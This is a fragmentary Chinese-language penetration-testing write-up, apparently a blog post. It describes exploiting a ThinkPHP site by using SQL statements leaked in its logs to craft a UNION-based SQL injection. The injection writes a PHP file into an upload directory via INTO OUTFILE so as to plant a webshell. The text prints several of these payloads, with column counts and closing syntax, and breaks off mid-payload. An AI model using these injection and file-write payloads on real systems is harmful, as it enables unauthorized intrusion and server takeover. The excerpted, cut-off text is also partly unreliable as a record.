他写三个难道就只有三个功能嘛?我不信,开扫!...喔唷~这是啥,这不是我前台测试时打的单引号嘛日志中居然存在Sql执行语句8.Sql语句记录到日志中,并发现Sql语句报错信息,语句闭合为 )这时候就可以靠 ThinkPHP日志泄露 + Sql注入打一个组合拳了...在目录扫描的时候存在一个demo目录,这不就有了吗11.为啥要读文件呢,因为查权限就没那个必要,还浪费时间,能读就能写。...直接手动判断列数写文件,最终在第9列成功写入文件从1) union select 1 into outfile 'xxx\/reg\/upload\/1.php' --+ 到1) union select...1,2,3,4,5,6,7,8,'1' into outfile 'xxx\/reg\/upload\/1.php' --+写入Webshell15.构造语句:1) union select 1,2,3,4,5,6,7,8